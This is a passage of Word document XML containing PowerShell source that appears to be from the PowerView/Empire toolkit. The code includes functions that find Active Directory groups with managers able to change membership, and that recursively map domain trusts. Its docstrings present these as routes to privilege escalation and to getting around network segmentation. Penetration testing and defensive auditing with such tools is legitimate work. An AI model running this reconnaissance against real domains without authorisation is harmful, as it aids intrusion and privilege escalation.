    <w:p w14:paraId="1782149A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Enumerating trust groups in domain $DomainTrust"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745D08A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021A4B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B7F2CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA1D14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6A5F1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF7CA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDF772" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AB605" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20659CFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="754427BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-ManagedSecurityGroups {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B586B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD89C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B375D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AA7BABC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function retrieves all security groups in the domain and identifies ones that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB390DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        have a manager set. It also determines whether the manager has the ability to add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C974EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or remove members from the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3997B7F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C79289E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: Stuart Morgan (@ukstufus) &lt;stuart.morgan@mwrinfosecurity.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17FD7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7664277B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B4B84AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2DEFBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C52E81F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-ManagedSecurityGroups | Export-PowerViewCSV -NoTypeInformation group-managers.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239FCB86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="444F9A7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Store a list of all security groups with managers in group-managers.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE679D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70DCEB12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632F3B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BBBCBB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Authority to manipulate the group membership of AD security groups and distribution groups </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E82A2A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A636C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        used to delegate management authority to distribution groups, but Windows supports security groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27908254" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        being managed in the same way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4AB1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7884F56F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function searches for AD groups which have a group manager set, and determines whether that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC8A03B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        user can manipulate group membership. This could be a useful method of horizontal privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB7C97A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        escalation, especially if the manager can manipulate the membership of a privileged group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9498E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E47865B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA2CA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="008EA842" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://github.com/PowerShellEmpire/Empire/pull/119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD98CF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6400F6C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14074393" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75B822BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Go through the list of security groups on the domain and identify those who have a manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34197950" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Get-NetGroup -FullData -Filter '(managedBy=*)' | Select-Object -Unique distinguishedName,managedBy,cn | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FC502" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F45BA7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Retrieve the object that the managedBy DN refers to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110224E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $group_manager = Get-ADObject -ADSPath $_.managedBy | Select-Object cn,distinguishedname,name,samaccounttype,samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300DC74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03165158" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Create a results object to store our findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3B528C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $results_object = New-Object -TypeName PSObject -Property @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA7378" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'GroupCN' = $_.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C8C50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'GroupDN' = $_.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFBFD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ManagerCN' = $group_manager.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399EF352" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ManagerDN' = $group_manager.distinguishedName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E95952" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ManagerSAN' = $group_manager.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1014720A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ManagerType' = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67958A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'CanManagerWrite' = $FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0B9E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48CCF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32EC688A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Determine whether the manager is a user or a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273482E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($group_manager.samaccounttype -eq 0x10000000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4E295" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $results_object.ManagerType = 'Group'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9527C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        } elseif ($group_manager.samaccounttype -eq 0x30000000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822BE61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $results_object.ManagerType = 'User'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE499B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8AAC41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="41FF1780" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Find the ACLs that relate to the ability to write to the group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723553E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $xacl = Get-ObjectAcl -ADSPath $_.distinguishedname -Rights WriteMembers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E0ACEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="005691B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Double-check that the manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14209A89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AccessControlType -eq 'Allow' -and $xacl.IdentityReference.Value.Contains($group_manager.samaccountname)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D532B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $results_object.CanManagerWrite = $TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B073B7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8246A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $results_object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DCAA57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F9E40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E6E480" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71D8E7E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2944735D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-MapDomainTrust {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A7B58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272AC087" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E28C18D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C961523" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function gets all trusts for the current domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5D487" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        and tries to get all trusts for each domain it finds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA71FC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C7ADBE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051FE43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04941AAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CFF327" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        More likely to get around network segmentation, but not as accurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B001A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F3B2486" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF51ADF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3814AFF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF26C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="366F0219" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB04B34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1541E6BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D496F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7636F552" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E4E5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63C11E20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AD9163" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF3BAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="789195AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427C3F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0494FA74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-MapDomainTrust | Export-CSV -NoTypeInformation trusts.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6258D7F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561A51A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Map all reachable domain trusts and output everything to a .csv file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E079AC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54C9B74F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A2492" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23A9CAD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blog.harmj0y.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D72665" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE8C271" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F78230C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE54D77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD99A5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LDAP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700383E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51E71B04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A043EFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF18E9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70F8C592" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C05639" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B876A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC3250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B1324DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687A3196" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD38A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06028356" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29751D9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # keep track of domains seen so we don't hit infinite recursion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFDB953" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $SeenDomains = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB5BD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3ABF849A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # our domain status tracker</w:t>
      </w:r>
    </w:p>
